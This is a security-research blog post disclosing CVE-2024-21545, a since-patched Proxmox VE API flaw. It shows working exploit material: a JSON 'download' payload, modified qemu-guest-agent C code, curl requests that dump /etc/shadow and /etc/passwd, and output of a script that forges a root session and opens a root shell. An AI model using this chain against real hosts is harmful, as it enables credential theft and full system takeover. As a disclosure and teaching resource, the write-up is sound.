Proxmox VE CVE-2024-21545 - Tricking the API into giving you the keys

Written by:

0 mins read

During some recent research in Security Labs, we identified CVE-2024-21545 in Proxmox VE 8.2.2. This can allow an authenticated attacker to fully take over the target system, starting with a relatively limited permission set. Keep reading to go on a journey of discovery, exploitation, and variant analysis to find the two exploitation vectors for the same root cause.

Proxmox fixed this vulnerability on 23rd Sept 2024 as part of their normal release cycle, their advisory is available here. They also identified that this vulnerability impacted Proxmox Mail Gateway, which was similarly fixed.

What is Proxmox VE?

In their own words:

“Proxmox Virtual Environment is a complete, open source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage, and networking functionality, on a single platform. With the integrated web-based user interface you can manage VMs and containers, high availability for clusters, or the integrated disaster recovery tools with ease.” - proxmox.com

API Handlers

As with most research projects, this one started with a healthy dose of code review. This time it was Perl. After installing a test system in a virtual machine and logging in, I identified the source code location as /usr/share/perl5/PVE and downloaded a copy. I later found that the code is open source, and I could have saved myself entire minutes.

My first aim in looking at the code was to identify how API requests are handled and dispatched, and how the permissioning system works. Proxmox has a pretty granular RBAC system which can be configured to give specific permissions over specific resources to specific users or groups. For example, to start a VM you need the VM.PowerMgmt permission over the /vms/{vmid} path, or some parent path.

Each API endpoint is defined using a hash of various items, including description, the function to be executed, and additional parameters like the permissions. Following our example from the above, the API handler for the VM start endpoint is defined as follows:

__PACKAGE__->register_method({
    name => 'vm_start',
    path => '{vmid}/status/start',
    method => 'POST',
    protected => 1,
    proxyto => 'node',
    description => "Start virtual machine.",
    permissions => {
      check => ['perm', '/vms/{vmid}', [ 'VM.PowerMgmt' ]],
    },
    parameters => {
      additionalProperties => 0,
      properties => {
        node => get_standard_option('pve-node'),
        vmid => get_standard_option('pve-vmid',
          { completion => \&PVE::QemuServer::complete_vmid_stopped }),
        [snipped]
        timeout => {
          description => "Wait maximal timeout seconds.",
          type => 'integer',
          minimum => 0,
          default => 'max(30, vm memory in GiB)',
          optional => 1,
        },
      },
    },
    returns => {
      type => 'string',
    },
    code => sub {
      [snipped]
    }});

Some of these parameters are not important to us or will be discussed later, but the key parameters we can see include the path the request handler handles, the permissions check showing the VM.PowerMgmt we outlined earlier, the request parameters with the (annoyingly effective) validation, and finally the actual code function to be executed (snipped here because it’s pretty long). Most of this information is helpfully exposed via the Proxmox API documentation page which proved very handy for building valid requests to call the endpoints.

All the API endpoints supported by the service are registered similarly to the above, and for each request that the server receives, the appropriate handler is selected and executed. This occurs in the function handle_api2_request.

Reading Arbitrary Files?

When reading this specific function I noticed something potentially interesting:

sub handle_api2_request {
  my ($self, $reqstate, $auth, $method, $path, $upload_state) = @_;

[snipped]
    my $res = $self->rest_handler($clientip, $method, $rel_uri, $auth, $params, $format); # <-- 1
[snipped]
    my $download = $res->{download};
    $download //= $res->{data}->{download} # <-- 2
    if defined($res->{data}) && ref($res->{data}) eq 'HASH';
    if (defined($download)) {
      send_file_start($self, $reqstate, $download); # <-- 3
      return;
    }
[snipped]
}

At item 1 in the above code block, we can see the entry point for the specific API handler for the request that has been received. This is dynamically dispatched based on the request and references the registered methods like those we have already seen. At item 2 we see that the return object from this function is being inspected for either a ‘download’ or ‘data->download’ sub-object. Finally, at item 3 we can see this object being used to send a file to the API client based on the contents of the download object.

I also did some additional code review wherein I identified the format expected by the send_file_start function.

The following object layout in either the data or data->download objects in the response from the API handler will result in reading arbitrary files from the system.

{
  "download": {
    "path": "/etc/shadow",
    "content-type": "text/plain"
  }
}

The path in the example here somewhat gives it away, but as we will see soon, we can read privileged files such as /etc/shadow, as well as more interesting files.

Finding Control

We’ve now identified a potential method to read arbitrary files from the file system but, unfortunately, it’s not that simple. Though we’ve found a potential vector, we still need to find a way to control the response object from the API handler to insert the ‘download’ key.

It would take a LOT of time to go through all the code in the numerous API endpoints in this system to identify the ones in which we could achieve this kind of control. I had to find a way to pre-filter which API endpoints I should manually look at.

I justified that there are two potential vectors for controlling this output. The first is a classic web application security methodology of looking for endpoints that return the data passed in as-is, after some kind of mutation, or after storage and retrieval. The second potential vector is more specific to the Proxmox system. A number of the API endpoints deal directly or indirectly with external components such as virtual machines/containers or external services like ACME for TLS certificates.

For the first methodology, I leveraged the strict request validation. (almost) Every API endpoint explicitly defines the request object it expects, and the types and formats for every key/value passed. If any inputs violate these rules, the request is rejected before onward processing. This allows us to filter the API endpoints based on those that will receive an object that looks similar to the desired output.

There is an additional wrinkle here, which is my ‘(almost) Every API endpoint’: One optional parameter API handler can pass is additionalProperties. If passed and true, this parameter signifies to the request validator that additional parameters are allowed even where they are not explicitly enumerated in the request definition. To search for these two constraints, we first need to get a dump of the API. Conveniently, the API handler provides a convenient api_dump function we can call to export all of the endpoint definitions:

use PVE::API2;
use PVE::RESTHandler;
use JSON;
my $JSON = JSON->new->utf8;
$JSON->allow_unknown(1);
$JSON->allow_blessed(1);

print $JSON->encode(PVE::RESTHandler::api_dump(PVE::API2));

This gives us a nice JSON blob that contains all of the definitions we need, such as the following for the ‘start’ endpoint we saw earlier:

{
  "info": {
    "POST": {
      "permissions": {
        "check": ["perm", "/vms/{vmid}", ["VM.PowerMgmt"]]
      },
      "method": "POST",
      "name": "vm_start",
      "returns": {"type": "string"},
      "description": "Start virtual machine.",
      "proxyto": "node",
      "parameters": {
        "properties": {
          "node": {
            "type": "string",
            "typetext": "<string>",
            "description": "The cluster node name.",
            "format": "pve-node"
          },
[snipped]
        },
        "additionalProperties": 0
      },
      "protected": 1,
      "allowtoken": 1
    }
  },
  "leaf": 1,
  "text": "start",
  "path": "/nodes/{node}/qemu/{vmid}/status/start"
}

This is essentially the same information we saw at the start but this time it’s easy to throw together some Python to filter out what we want. We can now filter based on the return type (we need an object or we can’t include the ‘download’ parameters), the properties (if it includes a ‘download’ input, it might be worth looking for a ‘download’ in the output), and the additionalProperties flag we discussed earlier.

Whilst some endpoints fit the criteria, they did not allow sufficient control over the response object to exploit the identified vulnerability which unfortunately led us to a dead end.

Next, let's consider another potential way to control response bodies: requests that interact with external components or systems. There are relatively few of these, and while the definition is somewhat 'conceptual', it's easy to identify them by visually inspecting the list of requests and then analyzing them further.

Talk to my agent

One of the endpoints that immediately caught my eye was the agent/exec endpoint, the description for this endpoint states that this endpoint 'Executes the given command in the vm via the guest-agent and returns an object with the pid.'

The ‘guest-agent’ is the Qemu guest agent, a service that can be installed within your virtual machines. It enables communication between the hypervisor and the guest virtual machine, facilitating tasks like obtaining guest status info (IP addresses, memory usage information, etc), and executing commands, as used by this API endpoint. The communication channel is a virtual serial port added to the virtual machine, which both the hypervisor and guest agent connect to for bidirectional communications using JSON objects.

The definition for this endpoint is below:

__PACKAGE__->register_method({
    name => 'exec',
    path => 'exec',
    method => 'POST',
    protected => 1,
    proxyto => 'node',
    description => "Executes the given command in the vm via the guest-agent and returns an object with the pid.",
    permissions => { check => [ 'perm', '/vms/{vmid}', [ 'VM.Monitor' ]]},
    parameters => [snipped],
    returns => [snipped],
    code => sub {
	my ($param) = @_;

	my $vmid = $param->{vmid};
	my $cmd = $param->{command};

	my $res = PVE::QemuServer::Agent::qemu_exec($vmid, $param->{'input-data'}, $cmd);
	return $res;
    }});

In the request handler definition above, the endpoint returns the result from the qemu_exec function without modification. By tracing this function through nested calls, we find that the value in $res corresponds to the 'return' key in the JSON object returned by the guest agent. Using this knowledge, we can look into patching qemu-ga (The Qemu guest agent binary) to determine if we can manipulate the response object and exploit the identified download vulnerability.

Modifying the send_response function in the qemu-guest-agent main.c ended up being relatively straightforward. But it's crucial to carefully select which specific responses to replace, as this function is used for all agent requests, and Proxmox may not tolerate unexpected behavior from the qemu-guest-agent during VM bootup. I addressed this by checking the normal response JSON and replacing it only when the contents included an error message. Since we’re targeting the ‘exec’ function, we can simply pass a nonexistent command, causing the guest agent to return an error message containing 'Failed to execute child process'. When this string is detected, we respond with:

{
  "return": {
    "download": {
      "path": "/etc/shadow",
      "content-type": "text/plain"
    }
  }
}

Compiling this change and executing our newly built qemu-ga binary as root inside our VM allows us to perform a valid and authenticated request against the agent/exec API endpoint and it will respond with the contents of /etc/shadow returned to us.

This is good news! This means that our initial vulnerability path is exploitable in this case.

Having to re-compile the Qemu guest agent for every new file we want to steal is fiddly and slow, so we can again modify the guest agent send_response function to use the error code as a messaging channel (there are a few paths we could take for a messaging channel, but since we’re already editing this function this is the cleanest). The full error message we were using before actually includes the full path to the command we failed to execute:

{
  "error": {
    "class": "GenericError",
    "desc": "Guest agent command failed, error was 'Failed to execute child process \\u201CNOTFOUND/etc/shadow\\u201D (No such file or directory)'"
  }
}

We can use this error message as a messaging channel. By prefixing the command we want to execute with something that will never exist ('NOTFOUND' in the above example), we can then take the rest of the quoted path in the error message as our targeted file. This allows us to change which file we read without having to recompile and restart qemu-ga each time. Therefore, the actual changes we’ve made to qemu-ga are the following:

    char *path;
    if ((path = strstr(response->str, "Failed to execute child process \\u201CNOTFOUND")) != NULL) {
        path += strlen("Failed to execute child process \\u201CNOTFOUND");
        char *end = strstr(path, "\\u201D");
        end[0] = '\0';
        printf("%s\n", path);
        response = g_string_new("{\"return\":{\"download\":{\"path\":\"");
        g_string_append(response, path);
        g_string_append(response, "\",\"content-type\":\"text/plain\"}}}");
    }

And with that in place, we can see it in action:

$ curl -sk -XPOST -H 'CSRFPreventionToken: [snipped]' -b PVEAuthCookie=[snipped] \
 'https://proxmox.vm.lab:8006/api2/json/nodes/proxmox/qemu/102/agent/exec?command=NOTFOUND/etc/shadow'
root:$y$j9T$MKtWMbEST8Zq6UxfESBG71$larD/XwgNEdttqEpPKTmOa9ZVmKHXykdF43MaURDqS6:19940:0:99999:7:::
[snipped]

We’ve managed to successfully steal the contents of the /etc/shadow file from the Proxmox host with only the VM.Monitor permission and root access to a VM. Since the Qemu guest agent executes commands as root, VM.Monitor on its own implies root access to any VMs to which the permission is applied.

Session Forgery

/etc/shadow makes for a nice proof of concept, but without potentially significant effort to crack the hashes (my password of ‘password’ notwithstanding), you can’t necessarily turn it into RCE. I wanted to improve this vulnerability’s impact so I went hunting for a more interesting proof of concept.

When I looked at the authentication methods during my earlier code review, I noticed that it was based on cryptography rather than values stored inside a database. This means that if we can steal the keys used to sign the session token we can log in as any user. By default, there is a root@pam user present on Proxmox with full permissions over everything, which makes for a very juicy target.

A normal Proxmox session token looks something like this:

PVE:[username]@[realm]:[hex timestamp]::[Base64 encoded signature]

Combining a session token and a CSRF token based on cryptographic signatures creates a valid session. Digging through the authentication handling code it seems that forging both tokens only requires the contents of /etc/pve/pve-www.key and /etc/pve/priv/authkey.key. Using these files, along with Perl's Digest::SHA::hmac_sha256_base64 and OpenSSL, we can generate 'forged' tokens to make API requests as any target user. As far as I can tell, there's no fundamental flaw in this authentication scheme; however, these files require root access on the host to be read and forged.

Fortunately, we took the time to make our arbitrary file read nice and flexible, so we could easily grab these two files. I won’t go into detail on how to specifically use these files as it’s the same existing authentication code ripped out and ported to a shell script. The output below demonstrates the end-to-end execution of this attack, beginning with reading the /etc/shadow fileto confirm our attack's effectiveness. We then forge a root session by acquiring the necessary files and signing the correct data in the appropriate formats to generate new session tokens. Once we have our crafted session tokens we can use the node console functionality in the API to establish an interactive root shell.

$ sh qgalfr.sh https://proxmox.vm.lab.rorys.network:8006 lowpriv@pve password 102
Logged in as lowpriv@pve
Confirmed user has VM.Monitor on /vms(/102)?
Reading /etc/shadow...
root:$y$j9T$MKtWMbEST8Zq6UxfESBG71$larD/XwgNEdttqEpPKTmOa9ZVmKHXykdF43MaURDqS6:19940:0:99999:7:::
Forging root session...
Reading /etc/pve/priv/authkey.key...
Signing 'PVE:root@pam:66F1709D' for authentication token...
Reading /etc/pve/pve-www.key...
HMAC'ing '66F1709D:root@pam' for csrf token...
Forged session, logged in as root@pam
Opening shell session
OKroot@proxmox:~# hostname
proxmox
root@proxmox:~# id
uid=0(root) gid=0(root) groups=0(root)

Variant Analysis

Our initial vulnerability was in the API handling code, not in any single API handler, and so far we’ve only looked at one method of exploiting this. After confirming the vulnerability is exploitable, I spent some time trying to find other endpoints that would let us exploit the vulnerability in the same way. The endpoint we have discussed so far required the VM.Monitor permission which, while relatively low-privileged compared to some of the other permissions available, I still wanted to see if I could get more ‘coverage’ of permissions to see if we could make this attack even more impactful.

Returning to our original criteria, we can easily identify our next target: /cluster/acme/meta. This endpoint retrieves ACME Directory Meta Information. Examining the code, we once again observe that it directly returns the object from a library function:

code => sub {
 my ($param) = @_;

  my $directory = extract_param($param, 'directory') // $acme_default_directory_url;

  my $acme = PVE::ACME->new(undef, $directory);
  my $meta = $acme->get_meta();

  return $meta;
}

Following the control flow, we see that this code path performs a GET request to the URL provided in the directory parameter, and returns the value in the ‘meta’ key in the response object retrieved from the URL. This is almost the same as what we saw earlier, but with ‘meta’ rather than ‘return’. Fortunately, this is quick to create a proof of concept for. The only real requirement is that the URL being requested has a valid HTTPS certificate. I chose to use httpbingo.org in this proof of concept, as it’s a simple service that can be requested to return a JSON blob passed in as a URL parameter. This minimizes the amount of infrastructure I need to create to validate the concept. We can see this in action below:

$ curl https://httpbingo.org/base64/decode/eyJtZXRhIjp7ImRvd25sb2FkIjp7InBhdGgiOiIvZXRjL3Bhc3N3ZCIsImNvbnRlbnQtdHlwZSI6InRleHQvcGxhaW4ifX19Cg%3d%3d
{"meta":{"download":{"path":"/etc/passwd","content-type":"text/plain"}}}

We can see this in action against the cluster/acme/meta endpoint below:

$ curl -sk -H 'CSRFPreventionToken: [snipped]' -b PVEAuthCookie=[snipped] \
'https://proxmox.vm.lab:8006/api2/json/cluster/acme/meta?directory=https://httpbingo.org/base64/decode/eyJtZXRhIjp7ImRvd25sb2FkIjp7InBhdGgiOiIvZXRjL3Bhc3N3ZCIsImNvbnRlbnQtdHlwZSI6InRleHQvcGxhaW4ifX19Cg%3d%3d'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[snipped]

This output shows that we’ve identified another vector for our same root cause vulnerability, this time needing the Sys.Audit permission rather than VM.Monitor from before. This is arguably a higher privilege permission, but still should not provide this level of access.

Privilege Separation

You will notice in the above proof of concept we only read the /etc/passwd file, rather than the /etc/shadow file of our first proof of concept. Trying to read /etc/shadow confused me for a while until I dug further into the request handling code. Going back to our API endpoint definitions, there is one parameter that quite significantly changes the impact of this vulnerability: the protected parameter.

In short, in Proxmox API endpoints are either marked as ‘protected’, or not. If an API endpoint is not marked as protected, as in the case of the /cluster/api/meta endpoint, it will be executed inside the server process pveproxy, which is listening on the exposed port. This process is running as the www-data user and cannot read sensitive files such as /etc/shadow, or the authentication keys we used earlier. This means that the impact of this specific instance is very limited, and can only really be used to steal log data or VM configuration files.

On the other hand, if an API endpoint is marked as protected, as the agent/exec endpoint from earlier was, this request will be proxied to a second server process pvedaemon, which is only accessible locally to the Proxmox machine. This process is running as root, and therefore when we exploit our first proof of concept the file read is also executing as root, resulting in our ability to read privileged files such as /etc/shadow and the authentication keys. I found this to be a very interesting privilege separation method, as it allows for lower and higher privilege actions to be executed relatively transparently, without requiring all code to be running with higher privileges.

Conclusion

During this research project, we pinpointed a potential root cause for a vulnerability within the high-level API handling code that processes all requests. We then used our exploitation requirements to systematically search through all of the API endpoints and identify promising targets. Filtering what gadgets we need to exploit a specific vulnerability can drastically reduce the amount of manual work, especially the manual code review required to find a successful exploitation path.

The main takeaway from this project is that sometimes you need to read a lot of code ‘around’ where vulnerabilities normally occur (such as directly in an API endpoint handler) to find the vulnerabilities. API request routers themselves are often ignored as part of the background but we have shown that they can sometimes themselves be exploited, using what would otherwise appear to be innocuous functionality (who cares if you can partially control a JSON response from an API?).

To fix this, the Proxmox team explicitly marked those API endpoints that are expected to be able to trigger file downloads. This significantly reduces the potential attack surface of the request router, and endpoints designated for file downloads can no longer be used to arbitrarily control response data, effectively mitigating this vulnerability. Shout out to the Proxmox team for responding quickly to our report and having a working patch in just a few days.

Secure your code with cutting edge intel

Learn about the full range of Snyk Code SAST functionality in only 30 minutes.

Book a live demo Start free

The developer security platform

Want to try it for yourself?